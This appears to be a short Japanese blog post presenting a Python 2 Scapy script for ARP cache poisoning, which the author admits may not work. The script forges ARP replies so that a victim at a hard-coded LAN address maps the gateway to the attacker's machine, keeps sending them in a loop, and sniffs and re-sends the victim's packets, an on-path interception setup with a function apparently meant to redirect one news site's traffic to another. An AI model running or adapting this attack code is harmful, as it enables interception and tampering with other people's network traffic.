Scapy応用

Scapyを使ってARP cache Poisoning してみようというソースです。動くかは分かりません。

# -*- coding: utf-8 -*-
 
from optparse import OptionParser
import threading
import time
import sys
 
from scapy.all import *
from scapy import *
 
 
VICTIM_IP = '192.168.107.45'
VICTIM_MAC = ''
 
GATEWAY_IP = '192.168.107.1' #router
GATEWAY_MAC = ''
 
ATTACKER_IP = ''
ATTACKER_MAC = ''
 
 
class ArpPoisonThread(threading.Thread):
  def __init__(self, arp_response):
    threading.Thread.__init__(self)
    self.arp_response = arp_response
    self.cont = True
 
  def finish(self):
    self.cont = False
 
  def run(self):
    while self.cont:
      send(self.arp_response)
 
 
def hurriyet_to_zaman(packet):
  if IP in packet and packet[IP].src == VICTIM_IP:
    packet.show()
    packet[Ether].dst = GATEWAY_MAC
    packet.show()
    send(packet)
 
 
 
def main():
  global VICTIM_IP, VICTIM_MAC
  global ATTACKER_IP, ATTACKER_MAC
  global GATEWAY_IP, GATEWAY_MAC
 
  #Zaman DNS çözümle
  ans, unansw = sr(IP(dst="193.255.97.2")/UDP()/DNS(rd=1,qd=DNSQR(qname="www.zaman.com.tr")))
  dns_answer = ans[0][1]
  dns_answer.show()
 
  #gateway'in mac adresini öğren
  ans, unansw = sr(ARP(hwdst=ETHER_BROADCAST,
                       pdst=GATEWAY_IP))
  arp_response = ans[0][1]
  GATEWAY_MAC = arp_response.hwsrc
 
  #broadcast ARP isteği oluştur.
  arp_request = ARP(hwdst=ETHER_BROADCAST,
                    pdst=VICTIM_IP)
 
  #ip ve mac adresimi öğren.
  ATTACKER_MAC = arp_request.hwsrc
  ATTACKER_IP = arp_request.psrc
 
  print ATTACKER_MAC, ATTACKER_IP
 
  #hedef bilgisayarın mac adresini öğren.
  ans, unansw = sr(arp_request)
  arp_response = ans[0][1]
  VICTIM_MAC = arp_response.hwsrc
 
  #arp yanıtını daha sonra göndermek üzere zehirle.
  arp_response.hwsrc = ATTACKER_MAC
  arp_response.hwdst = VICTIM_MAC
  arp_response.psrc = GATEWAY_IP
  arp_response.pdst = VICTIM_IP
 
  arp_poison_thread = ArpPoisonThread(arp_response)
  arp_poison_thread.start()
 
  #sniff_thread = SniffThread()
  #sniff_thread.start()
 
 
  try:
    sniff(prn=hurriyet_to_zaman, count=10000)
  except (KeyboardInterrupt, SystemExit):
      arp_poison_thread.finish()
      sys.exit()
      raise
 
 
 
if __name__ == '__main__':
  main()

また読みます。

広告を非表示にする